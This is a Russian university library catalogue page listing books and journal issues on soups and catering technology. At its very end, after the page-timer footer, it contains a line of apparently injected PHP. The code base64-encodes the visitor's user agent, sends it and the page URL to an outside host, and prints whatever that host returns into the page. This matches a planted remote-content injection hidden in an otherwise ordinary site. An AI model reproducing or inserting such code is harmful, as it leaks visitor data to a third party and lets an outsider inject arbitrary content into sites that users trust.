Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

132 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Супы")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 22
1. 
Романова Т. В. Приятного аппетита! [Текст] / Т. В. Романова, 1990. - 200 с. [8] вкл. цв. л. с.
Ключевые слова 
КУЛИНАРИЯ ДОМАШНЯЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- СЕРВИРОВКА СТОЛА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- СУПЫ -- ЩИ -- БОРЩ -- РАССОЛЬНИК -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА МУЧНЫЕ -- БЛЮДА СЛАДКИЕ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- КРЕМ -- КАША ГУРЬЕВСКАЯ -- НАПИТКИ -- ТЕСТО ДРОЖЖЕВОЕ -- ПИРОГ -- ТЕСТО СЛОЕНОЕ -- МАННИК -- КЕКС -- ХВОРОСТ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- ФРУКТЫ -- ОВОЩИ -- КУХНЯ ОМСКАЯ -- ЗЕЛЬЦ -- СТУДЕНЬ -- СТЕРЛЯДЬ -- ЩУКА -- ВЕРЕЩАКА -- ПЕЛЬМЕНИ -- ПАСХА
Держатели документа (Информация об экземплярах) 
2. 
Казанцева, Светлана Петровна. Алтайская национальная кухня : учебное пособие по части курса для студентов дневной и заочной форм обучения специальности "Технология и предпринимательство" / С. П. Казанцева, И. Б. Соловьева, 2008. - 27 с.
Держатели документа (Информация об экземплярах) 
3. 
Усов, Владимир Васильевич. Основы кулинарного мастерства : учебное пособие для студентов среднего профессионального образования / В. В. Усов, 2007. - 608 с.
Держатели документа (Информация об экземплярах) 
4. 
Харченко, Нелли Эрьевна. Сборник рецептур блюд и кулинарных изделий : учебное пособие для начального профессионального образования / Н. Э. Харченко, 2006. - 496 с.
Держатели документа (Информация об экземплярах) 
5. 
Технология производства продукции общественного питания [Текст] / В. С. Баранов, А. И. Мглинец, Л. М. Алешина, 1986. - 400 с.
Ключевые слова 
ТЕХНОЛОГИЯ общественного питания -- АССОРТИМЕНТ ПРОДУКЦИИ -- ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ПОЛУФАБРИКАТОВ -- ПОРЦИОНИРОВАНИЕ КУЛИНАРНОЙ ПРОДУКЦИИ -- КАЧЕСТВО КУЛИНАРНОЙ ПРОДУКЦИИ -- ПОЛУФАБРИКАТЫ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- СУПЫ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ВОДНОГО СЫРЬЯ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА БЫСТРОЗАМОРОЖЕННЫЕ -- БЛЮДА ОХЛАЖДЕННЫЕ -- ПРОИЗВОДСТВО МУЧНЫХ ИЗДЕЛИЙ -- БЛЮДА МУЧНЫЕ -- ГАРНИР -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕСКОЕЕ
Держатели документа (Информация об экземплярах) 
6. 
Питание и общество. - Журнал, 2010г. № 6
Оглавление 
  • Забнев, Сергей. Улун / С. Забнев. - с.11
  • Юшкова, А. О стратегии маркетинга / А. Юшкова. - с.12
  • Кучер, Л. Дипломатический протокол и этикет / Л. Кучер. - с.12-13
  • Арефьева, Анастасия. Я памятник тебе воздвиг, но рукотворный... / А. Арефьева. - с.14-15
  • Начало начал. - с.19
  • Ковалев, В. Холодные супы / В. Ковалев. - с.22
  • Филонов, М. Самый ранний овощ / М. Филонов. - с.23
  • Любина, Анастасия. Полезные сорняки-первоцветы / А. Любина. - с.24-25
  • Любина, Анастасия. Кардамон / А. Любина. - с.26
  • Пряные апельсины. - с.26
  • Арефьева, Анастасия. Восточные сладости / А. Арефьева. - с.27
  • Киреевский, Игорь. Азиатский десерт в меню Александра Македонского / И. Киреевский. - с.28
  • Ковалев, Н. И. Напитки русского стола / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.29
  • Киреевский, Игорь. Вечера на хуторе близ Диканьки / И. Киреевский. - с.30
  • "Земляничная поляна - солнца свет... ". - с.32
7. 
Вопросы питания. - Журнал, 2011г. т. 80 № 6
Оглавление 
  • Взаимосвязь изменений показателей перекисного окисления липидов, коэнзима Q 10 и свободных жирных кислот у крыс под влиянием жирового компонента рациона. - с.4-8
  • Токсиколого-гигиеническая характеристика наночастиц серебра, вводимых в желудочно-кишечный тракт крыс. - с.9-18
  • Потолицына, Н. Н. Липидный обмен у подростков - коренных жителей европейского Севера России / Н. Н. Потолицына, А. Ю. Людинина, Е. Р. Бойко. - с.19-22
  • Изучение пищевого поведения потребителей. - с.23-26
  • Ефимочкина, Н. Р. Значение некоторых потенциально патогенных микроорганизмов в возникновении пищевых токсикозов / Н. Р. Ефимочкина, И. Б. Куваева, Ф. С. Флуер. - с.27-34
  • Влияние пшеничных отрубей на обеспеченность организма витаминами. - с.35-42
  • Коденцова, В. М. Требования к качеству витаминов в составе премиксов и пищевых добавок / В. М. Коденцова, О. А. Вржесинская, В. В. Бессонов. - с.43-46
  • Сазонова, О. В. Пищевой статус у больных гемофилией с поражением суставов / О. В. Сазонова, Ю. А. Косякова, И. Л. Давыдкин. - с.47-51
  • Углицких, А. К. Эффективность комплексной системы диетологического обеспечения детей в критических состояниях / А. К. Углицких. - с.52-58
  • Супы в питании человека. - с.59-61
  • Обеспеченность селеном при хронической сердечной недостаточности различной этиологии. - с.62-66
  • Козлова, О. И. Определение методом высокоэффективной хроматографии стероидных сапонинов в биологически активных добавках к пище, содержащих экстракт якорцев стелющихся / О. И. Козлова, О. И. Передеряев, Г. В. Раменская. - с.67-71
  • Новый источник органических форм цинка. - с.72-75
  • Особенности пищевого статуса, антропометрических и клинико-биохимических показателей у профессиональных спортсменов, занимающихся различными видами спорта. - с.76-81
  • Сорокин, П. L-карнитин в детском питании / П. Сорокин. - с.82-83
  • Разгрузочно-диетическая терапия на современном этапе. - с.84
Держатели документа (Информация об экземплярах) 
8. 
Пищевая промышленность. - Журнал, 2011г. № 10
Оглавление 
  • Еделев, Д. А. Устранение рисков на протяжении жизненного цикла продуктов питания / Д. А. Еделев, В. М. Кантере, В. А. Матисон. - с.42-44
  • Закон защищает интересы потребителя. - с.64-66
  • Итоги работы предприятий пищевой и перерабатывающей промышленности России за январь-июль 2011 г.. - с.6-7
  • Серегин, С. Н. Создание современной системы хранения сельскохозяйственного сырья и продовольствия в решении задачи продовольственной безопасности России / С. Н. Серегин, К. В. Колончин. - с.8-11
  • Технологический поток фасовки и укупоривания двухфазных плодоовощных консервов. - с.12-13
  • Семенова, А. А. Вертикальная обвалка мяса / А. А. Семенова, В. В. Насонова, Ф. В. Холодов. - с.14-15
  • Груздева, Е. Н. Насосное оборудование для сыродельных предприятий / Е. Н. Груздева. - с.16-17
  • Оборудование для измельчения и диспергирования. - с.18-22
  • Шингисов, А. У. Вакуум-сублимационная сушка сгущенных кисломолочных продуктов с растительными добавками / А. У. Шингисов. - с.24-25
  • Цветометрическое количественное определение аминокислот и глицилглицина в водных растворах. - с.26-28
  • За упаковку давали награды и лишали жизни. - с.30-31
  • Стратегия развития машиностроения для пищевой и перерабатывающей промышленности. - с.32-33
  • Минаев, М. Ю. Экспресс-тест-система для определения остаточных белковых загрязнений / М. Ю. Минаев, Т. А. Фомина. - с.34-35
  • Груздева, Е. Н. Современное очистное оборудование на предприятиях молочной промышленности / Е. Н. Груздева. - с.36-37
  • Установки для гидрооптического обеззараживания воды. - с.38-39
  • Получение комплексов циклодекстринов с биологически активными веществами. - с.67-69
  • Функциональный паштет на основе прудовой рыбы с добавлением кальмара. - с.70-72
  • Первушин, В. В. Биологически активные вещества, повышающие адаптацию к физическим нагрузкам / В. В. Первушин, О. Е. Бакуменко. - с.73-74
  • [Новости НИИ и вузов]. - с.75
  • [Новости отраслевых союзов]. - с.76-77
  • [Новости компаний]. - с.78-79
  • Драчева, Л. В. Малая энергетика / Л. В. Драчева. - с.80
  • Продукты быстрого приготовления - мифы развенчаны. - с.81
  • Всероссийский фестиваль "Молочная страна-2011". - с.82
  • Семинары "Ярмарка идей". - с.83
  • Бурдун, Н. И. День знаний в МГУТУ / Н. И. Бурдун. - с.84-85
  • Новое интеллектуальное решение от "Тетра Пак". - с.39
  • Драчева, Л. В. Научно-практический семинар по моющим средствам / Л. В. Драчева. - с.40-41
  • Шумилова, И. Ш. Система оценки поставщиков продукции для предприятий общественного питания / И. Ш. Шумилова, Р. Р. Гадлгареева. - с.46-49
  • Коновалов, К. Л. Традиции и история мясного дела в Центральной Европе / К. Л. Коновалов. - с.50-53
  • Воробьева, О. В. Супы блокадного Ленинграда / О. В. Воробьева. - с.54-56
  • Жирард, Кристен. Потенциал ягоды на рынке здоровых снеков / К. Жирард. - с.58-59
  • Инкапсулированные ароматизаторы "Del'Ar" сделают продукты питания вкуснее. - с.60
  • Маджитов, Д. Ф. Трансглютаминаза от компании "Флора Ингредиентс" - эффективно и экономично / Д. Ф. Маджитов. - с.62-63
9. 
Питание и общество. - Журнал, 2011г. № 10
Оглавление 
  • Арефьева, Анастасия. Питание - глобальная проблема человечества / А. Арефьева. - с.2
  • Номофилова, Н. Суши для души. А для здоровья? / Н. Номофилова. - с.3
  • Диета против... диеты. - с.4-5
  • Гофман, Г. Универсальный продовольственный модуль приправ и соусов / Г. Гофман. - с.5
  • Лучшая колбаса - это... рыба. - с.6-7
  • Кучер, Л. Деловой прием: место, время, беседа за столом / Л. Кучер, Л. Шкуратова. - с.8-9
  • Самойлов, Юрий. Сервис, достойный Юлия Цезаря / Ю. Самойлов. - с.10-11
  • Рецепты от "Юлия Цезаря". - с.11
  • Самойлов, Юрий. Две ипостаси Евгения Рыбасова / Ю. Самойлов. - с.12-13
  • Любина, Е. Легендарные русские кулинары / Е. Любина. - с.14
  • Киреевский, И. Г. Миргород / И. Г. Киреевский. - с.14-15
  • Забнев, Сергей. Правила заварки / С. Забнев. - с.17
  • Арефьева, Е. Рис, или сарацинское зерно / Е. Арефьева. - с.18-19
  • Грибное рагу. - с.20
  • Арефьева, Елена. Скажите "чиииз"! / Е. Арефьева. - с.20-21
  • На Сицилии любят супы с сыром. - с.22
  • Арефьева, Анастасия. Девица-красавица в зелени / А. Арефьева. - с.23
  • Кулинарный словарик. - с.23
  • Каширина, Е. О пользе козьего молока / Е. Каширина. - с.24-25
  • Симонов, Г. Лучший памятник козе - массовое производство ее молока / Г. Симонов. - с.25
  • Про молоко. - с.26
  • Любина, Анастасия. Не так важен стресс, как его последствия / А. Любина. - с.26
  • Висит груша. Надо скушать!. - с.27
  • Ковалев, Н. И. Из глубины веков / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.28-29
  • Парк, Филипп. Мастер-класс французских поваров / Ф. Парк. - с.32
  • Гусиные окорочка с брокколи
10. 
Козлова, Светлана Николаевна. Кулинарная характеристика блюд : учебное пособие для начальное профессиональное образования / С. Н. Козлова, Е. Ю. Фединишина, 2006. - 192 с.
Держатели документа (Информация об экземплярах) 
11. 
Производственное обучение профессии "Повар" : учебное пособие для начального профессионального образования : в 4-х ч. / В. П. Андросов [и др.]. Ч. 2 : Супы, соусы, блюда из овощей, круп, макаронных изделий и бобовых, 2006. - 128 с.
Держатели документа (Информация об экземплярах) 
12. 
Голубь Н. Н. Технология продукции общественного питания [Текст] : учеб. пособие для студентов специальности 2711 "Технология продукции общественного питания" / Н. Н. Голубь, О. В. Пасько, 2005. - 68 с.
Держатели документа (Информация об экземплярах) 
13. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; под ред. М. А. Николаевой, 2005. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
14. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; Под ред. М. А. Николаевой, 2003. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
15. 
Завистовска, Зофья. Диетическое питание при различных заболеваниях [Текст] / З. Завистовска, 1992. - 221, [1] с.
Ключевые слова 
ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА ПИТАНИЯ -- ПИТАНИЕ ЗДОРОВОЕ -- БЕЛКИ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- САХАРИДЫ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- ВИТАМИНЫ- ПИТАНИЕ -- МЕНЮ ДИЕТИЧЕСКОЕ -- ДИЕТА ЛЕЧЕБНАЯ -- ДИЕТА ЛЕГКОУСВОЯЕМАЯ -- БОЛЕЗНЬ ЖЕЛУДКА - ПИТАНИЕ -- БОЛЕЗНЬ КИШЕЧНИКА - ПИТАНИЕ -- БОЛЕЗНЬ ПЕЧЕНИ - ПИТАНИЕ -- ДИАБЕТ САХАРНЫЙ - ПИТАНИЕ -- ОЖИРЕНИЕ - ПИТАНИЕ -- БОЛЕЗНЬ СЕРДЦА - ПИТАНИЕ -- БОЛЕЗНЬ ПОЧЕК - ПИТАНИЕ -- ТЕМПЕРАТУРА ВЫСОКАЯ - ПИТАНИЕ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ -- СУПЫ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ОВОЩИ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МУЧНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ КРУП - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ ЯИЦ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МЯСНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА РЫБНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- СОУС - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА СЛАДКИЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ ДИЕТИЧЕСКИЕ -- НАПИТКИ - ПИТАНИЕ ЛЕЧЕБНОЕ
16. 
Голубь Н. Н. Технология продукции общественного питания. Ч. 1 [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования / Н. Н. Голубь, З. П. Старостенко, О. В. Пасько, 2005. - 203 с.
Держатели документа (Информация об экземплярах) 
17. 
Сборник рецептур кулинарных изделий и блюд [Текст] : сборник, 2006. - 749 с.
Держатели документа (Информация об экземплярах) 
18. 
Сборник рецептур блюд и кулинарных изделий : нормативная документация для предприятий общественного питания / сост. А. В. Румянцев, 2000. - 968 с.
Держатели документа (Информация об экземплярах) 

Сборник подготовлен на основании приказа Комитета Российской Федерации по торговле от 25 мая 1995 г. № 57 и является методическим документом в области установления размеров и порядка применения норм отходов при первичной и тепловой обработках продуктов, расхода сырья, выхода полуфабрикатов и готовых блюд и изделий, последовательности технологических процессов, температурных режимов приготовления блюд и кулинарных изделий, взаимозаменяемости продуктов, кулинарного назначения мясных полуфабрикатов. Изложенные в каждом разделе технологические указания и краткие описания процессов приготовления блюд должны служить основой производственной работы предприятий общественного питания.

19. 
Ковалев Н. И. Технология приготовления пищи [Текст] : учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; под ред. М. А. Николаевой, 2008. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
20. 
Сборник рецептур блюд и кулинарных изделий из сои и соевых продуктов для предприятий общественного питания [Текст] : сб. технологических нормативов / под ред. М. П. Могильного, 2002. - 386 с.
Держатели документа (Информация об экземплярах) 
21. 
Ананьев, Алексей Ананьевич. Супы [Текст] / А. А. Ананьев, 1957. - 190, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3027 - 23.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.99 с.20 запросов, 0.60c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;